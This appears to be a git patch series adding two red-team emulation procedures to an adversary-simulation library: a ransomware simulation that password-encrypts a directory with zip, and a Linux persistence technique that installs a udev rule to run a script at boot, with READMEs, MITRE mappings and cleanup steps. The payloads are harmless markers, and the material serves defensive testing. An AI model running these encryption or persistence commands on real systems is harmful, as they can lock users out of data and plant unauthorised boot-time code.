From 33a9de299cbc0ba12a665f121b3ea4795b3bde8c Mon Sep 17 00:00:00 2001 From: gerbsec Date: Tue, 27 Aug 2024 12:18:49 -0400 Subject: [PATCH 1/4] Little late but a few TTPs :) --- ttps/impact/lotl-ransomware/README.md | 51 ++++++++++++++++ .../lotl-ransomware/lotl-ransomware.yaml | 34 +++++++++++ .../linux/udev-persistence/README.md | 58 +++++++++++++++++++ .../udev-persistence/udev-persistence.yaml | 38 ++++++++++++ 4 files changed, 181 insertions(+) create mode 100644 ttps/impact/lotl-ransomware/README.md create mode 100644 ttps/impact/lotl-ransomware/lotl-ransomware.yaml create mode 100644 ttps/persistence/linux/udev-persistence/README.md create mode 100644 ttps/persistence/linux/udev-persistence/udev-persistence.yaml diff --git a/ttps/impact/lotl-ransomware/README.md b/ttps/impact/lotl-ransomware/README.md new file mode 100644 index 0000000..9336706 --- /dev/null +++ b/ttps/impact/lotl-ransomware/README.md @@ -0,0 +1,51 @@ +# LOTL Ransomware Encryption + +![Meta TTP](https://img.shields.io/badge/Meta_TTP-red) + +This TTP leverages the `zip` command available on Linux systems to encrypt files in a specified directory, simulating a ransomware attack using tools already present on the machine. The command encrypts the contents of the target directory and requires a password for decryption, illustrating a data encryption impact scenario often used by threat actors. + +## Arguments + +- **target_dir**: The directory to encrypt. + + Default: /dev/shm + +- **encryption_key**: The password used to encrypt the directory. + + Default: password + +## Requirements + +1. Access to a Linux system where the `zip` and `unzip` commands are available. +2. Permission to modify files within the target directory. + +## Examples + +You can run the TTP using the following command (adjust arguments as needed): + +```bash +ttpforge run forgearmory//impact/data-encrypt/LOTL-ransomware/LOTL-ransomware.yaml \ + --arg target_dir="/path/to/target/dir" \ + --arg encryption_key="your_encryption_key" +``` + +## Steps + +1. **encrypt_dir**: Encrypts the specified directory using the provided encryption key. The directory is compressed into a zip file, which is encrypted with the password. + + ```bash + zip -r -P {{ .Args.encryption_key }} ttpforge.zip {{ .Args.target_dir }} + ``` + +1. **cleanup**: Attempts to restore the original state by decrypting and unzipping the encrypted directory. + + ```bash + unzip -P {{ .Args.encryption_key }} ttpforge.zip + ``` + +## MITRE ATT&CK Mapping + +- **Tactics**: + - TA0040 Impact +- **Techniques**: + - T1486 Data Encrypted for Impact diff --git a/ttps/impact/lotl-ransomware/lotl-ransomware.yaml b/ttps/impact/lotl-ransomware/lotl-ransomware.yaml new file mode 100644 index 0000000..e1e64c5 --- /dev/null +++ b/ttps/impact/lotl-ransomware/lotl-ransomware.yaml @@ -0,0 +1,34 @@ +--- +api_version: 2.0 +uuid: 0fc4bb3a-b864-4c33-8516-9b0654324ad9 +name: "LOTL Ransomware" +description: | + "Threat actors often need to utilize tools that are prexisting on the machine in order to perform TTPs. Often times threat actors are able to utilize something as simple as the `zip` command in order to encrypt files on a machine." + +args: + - name: target_dir + decription: The directory which we will encrypt. + default: /dev/shm + - name: encryption_key + description: The key which we will use to encrypt the data with. + default: password + +requirements: + platforms: + - os: linux + +mitre: + tactics: + - "TA0040 Impact" + techniques: + - "T1486 Data Encrypted for Impact" + +steps: + - name: encrypt_dir + description: Encrypt provided directory + inline: | + zip -r -P {{ .Args.encryption_key }} ttpforge.zip {{ .Args.target_dir }} + + cleanup: + inline: | + unzip -P {{ .Args.encryption_key }} ttpforge.zip diff --git a/ttps/persistence/linux/udev-persistence/README.md b/ttps/persistence/linux/udev-persistence/README.md new file mode 100644 index 0000000..7bbf31a --- /dev/null +++ b/ttps/persistence/linux/udev-persistence/README.md @@ -0,0 +1,58 @@ +# UDEV Persistence Technique + +![Meta TTP](https://img.shields.io/badge/Meta_TTP-red) + +This TTP utilizes a method of establishing persistence by creating a script that is automatically executed at boot time when the `/dev/random` device is loaded. It leverages udev rules to execute the script, making this an effective technique for maintaining access during system initialization. + +## Arguments + +- **target_path**: The path where the script and udev rule will be created. + + Default: /dev + +## Requirements + +1. Access to a Linux system with permissions to modify udev rules. +1. Ability to write files in critical system directories. + +## Examples + +You can run the TTP using the following command (adjust arguments as needed): + +```bash +ttpforge run forgearmory//persistence/unix/udev-persistence/udev-persistence.yaml \ + --arg target_path="/your/custom/path" +``` + +## Steps + +1. **create_persistence_script**: Creates a script in the specified path that will be executed upon system boot. + + ```bash + #!/bin/bash + echo "touch /root/exploited" > {{ .Args.target_path }}/udev.sh + chmod 0600 {{ .Args.target_path }}/udev.sh + ``` + +1. **add_udev_rule**: Adds a udev rule that triggers the script execution when the `/dev/random` device is loaded at boot time. + + ```bash + echo 'ACTION=="add", ENV{MAJOR}=="1", ENV{MINOR}=="8", RUN+="/bin/sh -c '{{ .Args.target_path }}/udev.sh'"' > /etc/udev/rules.d/75-persistence.rules + ``` + +## Cleanup + +1. **remove_udev_rule**: Deletes the udev rule from the system. + + ```bash + rm /etc/udev/rules.d/75-persistence.rules + ``` + +## MITRE ATT&CK Mapping + +- **Tactics**: + - TA0003 Persistence +- **Techniques**: + - T1546 Event Triggered Execution +- **Subtechniques**: + - T1546.004 Unix Shell Configuration Modification diff --git a/ttps/persistence/linux/udev-persistence/udev-persistence.yaml b/ttps/persistence/linux/udev-persistence/udev-persistence.yaml new file mode 100644 index 0000000..904d3d6 --- /dev/null +++ b/ttps/persistence/linux/udev-persistence/udev-persistence.yaml @@ -0,0 +1,38 @@ +--- +api_version: 2.0 +uuid: 96c74a6e-ecec-4559-846e-8027e1612a33 +name: "UDEV Persistence Technique" +description: | + "This technique creates a script that is executed when the /dev/random device is loaded, which is typically at boot time. This method uses udev rules to achieve persistence by triggering the script execution during system initialization, establishing a low-level method for maintaining access." + +args: + - name: target_path + description: The path where the script and udev rule will be created. + default: /dev + +requirements: + platforms: + - os: linux + +mitre: + tactics: + - "TA0003 Persistence" + techniques: + - "T1546 Event Triggered Execution" + subtechniques: + - "T1546.004 Event Triggered Execution: Unix Shell Configuration Modification" +steps: + - name: create_persistence_script + decription: Create the script that will be executed at boot. + create_file: {{ .Args.target_path }}/udev.sh + contents: + touch /root/exploited + mode: 0600 + cleanup: default + + - name: add_udev_rule + description: Add a udev rule to trigger the script at boot when /dev/random is loaded. + create_file: "/etc/udev/rules.d/75-persistence.rules" + contents: ACTION=="add", ENV{MAJOR}=="1", ENV{MINOR}=="8", RUN+="/bin/sh -c '{{ .Args.target_path }}/udev.sh'" + cleanup: + remove_path: "/etc/udev/rules.d/75-persistence.rules" From b087cbf42451efaf34a5b24226762eee6e503ab3 Mon Sep 17 00:00:00 2001 From: gerbsec Date: Tue, 27 Aug 2024 12:23:25 -0400 Subject: [PATCH 2/4] d --- ttps/impact/lotl-ransomware/lotl-ransomware.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/ttps/impact/lotl-ransomware/lotl-ransomware.yaml b/ttps/impact/lotl-ransomware/lotl-ransomware.yaml index e1e64c5..a3262af 100644 --- a/ttps/impact/lotl-ransomware/lotl-ransomware.yaml +++ b/ttps/impact/lotl-ransomware/lotl-ransomware.yaml @@ -11,7 +11,7 @@ args: default: /dev/shm - name: encryption_key description: The key which we will use to encrypt the data with. - default: password + default: password requirements: platforms: @@ -27,8 +27,8 @@ steps: - name: encrypt_dir description: Encrypt provided directory inline: | - zip -r -P {{ .Args.encryption_key }} ttpforge.zip {{ .Args.target_dir }} - + zip -r -P {{ .Args.encryption_key }} ttpforge.zip {{ .Args.target_dir }} + cleanup: inline: | unzip -P {{ .Args.encryption_key }} ttpforge.zip From 7d75d398a74d6050e223257be17663873bcf8896 Mon Sep 17 00:00:00 2001 From: gerbsec <67713732+gerbsec@users.noreply.github.com> Date: Mon, 16 Sep 2024 11:08:00 -0400 Subject: [PATCH 3/4] Update README.md --- ttps/impact/lotl-ransomware/README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/ttps/impact/lotl-ransomware/README.md b/ttps/impact/lotl-ransomware/README.md index 9336706..33a9c1a 100644 --- a/ttps/impact/lotl-ransomware/README.md +++ b/ttps/impact/lotl-ransomware/README.md @@ -24,7 +24,7 @@ This TTP leverages the `zip` command available on Linux systems to encrypt files You can run the TTP using the following command (adjust arguments as needed): ```bash -ttpforge run forgearmory//impact/data-encrypt/LOTL-ransomware/LOTL-ransomware.yaml \ +ttpforge run forgearmory//impact/ltol-ransomware/lotl-ransomware.yaml \ --arg target_dir="/path/to/target/dir" \ --arg encryption_key="your_encryption_key" ``` @@ -40,7 +40,7 @@ ttpforge run forgearmory//impact/data-encrypt/LOTL-ransomware/LOTL-ransomware.ya 1. **cleanup**: Attempts to restore the original state by decrypting and unzipping the encrypted directory. ```bash - unzip -P {{ .Args.encryption_key }} ttpforge.zip + unzip -o -P {{ .Args.encryption_key }} ttpforge.zip ``` ## MITRE ATT&CK Mapping From ee585af9b339492d781b3bb968bc5a48a6902eec Mon Sep 17 00:00:00 2001 From: gerbsec <67713732+gerbsec@users.noreply.github.com> Date: Mon, 16 Sep 2024 11:08:17 -0400 Subject: [PATCH 4/4] Update lotl-ransomware.yaml --- ttps/impact/lotl-ransomware/lotl-ransomware.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ttps/impact/lotl-ransomware/lotl-ransomware.yaml b/ttps/impact/lotl-ransomware/lotl-ransomware.yaml index a3262af..53c1ae1 100644 --- a/ttps/impact/lotl-ransomware/lotl-ransomware.yaml +++ b/ttps/impact/lotl-ransomware/lotl-ransomware.yaml @@ -31,4 +31,4 @@ steps: cleanup: inline: | - unzip -P {{ .Args.encryption_key }} ttpforge.zip + unzip -o -P {{ .Args.encryption_key }} ttpforge.zip